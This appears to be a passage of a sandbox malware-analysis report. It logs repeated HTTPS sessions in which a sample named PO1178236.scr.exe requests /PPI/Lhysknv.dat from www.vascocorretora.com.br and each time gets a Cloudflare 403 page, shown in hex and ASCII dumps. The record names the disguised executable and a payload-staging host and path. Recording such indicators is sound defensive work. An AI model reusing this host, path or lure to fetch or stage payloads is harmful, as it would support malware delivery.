        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:40 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:40 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:40 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 66 32 38 65 30 35 34 33 66 66 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1f28e0543ff</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:40 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 66 32 38 65 30 35 34 33 66 66 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1f28e0543ff',t:'MTczNjQwODIwMC4wMDAwMDA='};var
        2025-01-09 07:36:40 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        71192.168.2.949779188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:40 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:40 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:40 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:55 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn0x7zuEUt%2BJcW%2FD21O5rPz18uVV85ZYCJBcd1gVGb4cXtlEpKiEmbQOj%2B9F%2BTlA0rsBNMD5UqETwXyt3S%2BOnmW5WVRcsjVRq%2Fj0AonrZQDqgqSGNTSzsup9HINjwLnSi9VeBXX%2B1aIspiIT"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1f69c7d7cee-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1965&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1486005&cwnd=176&unsent_bytes=0&cid=8598f7b38ae909dd&ts=153&x=0"
        2025-01-09 07:36:40 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:40 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:40 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:40 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 66 36 39 63 37 64 37 63 65 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1f69c7d7cee</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:40 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 66 36 39 63 37 64 37 63 65 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 43 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1f69c7d7cee',t:'MTczNjQwODIwMC4wMDAwMDA=
        2025-01-09 07:36:40 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        72192.168.2.949780188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:41 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:41 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:41 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:56 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4Fvjl4CiGcL3QfE3PyhuP3rD0uDV9sgUkJHidiBMWRzHRqQqt7OaQtPkVYvHrVKYAUAPlYGaO7RmZkdiGi24u21iTczxM5%2FpysnzrXtS1DVztNR24anIef9yZPYX6FByq3jWsCOjxYxCr6d"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1fa993042cb-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1674&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1679125&cwnd=163&unsent_bytes=0&cid=713b6062e51ee2d5&ts=148&x=0"
        2025-01-09 07:36:41 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:41 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:36:41 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:36:41 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 66 61 39 39 33 30 34 32 63 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1fa993042cb</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:36:41 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 66 61 39 39 33 30 34 32 63 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1fa993042cb',t:'MTczNjQwODIwMS4wMDAwMDA='};var a=doc
        2025-01-09 07:36:41 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        73192.168.2.949781188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:41 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:41 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:41 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:56 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqAPbDxPQcXsCUuhh9vVe%2F10ID9b9hfMiFWVJjE9KmcLo5TG36N93dR17litGahL5Hs0KrovxYb6GRsvRIjw5hc642wtCgZ0FSD1h1AU8qOaFZ7wzJlBb6Hqpp%2BhWHBTbZ9U8cwOsc%2BF0Mu%2B"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1fe3ed6de9a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1614&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1809169&cwnd=209&unsent_bytes=0&cid=4d334698cda3eb9d&ts=119&x=0"
        2025-01-09 07:36:41 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:41 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
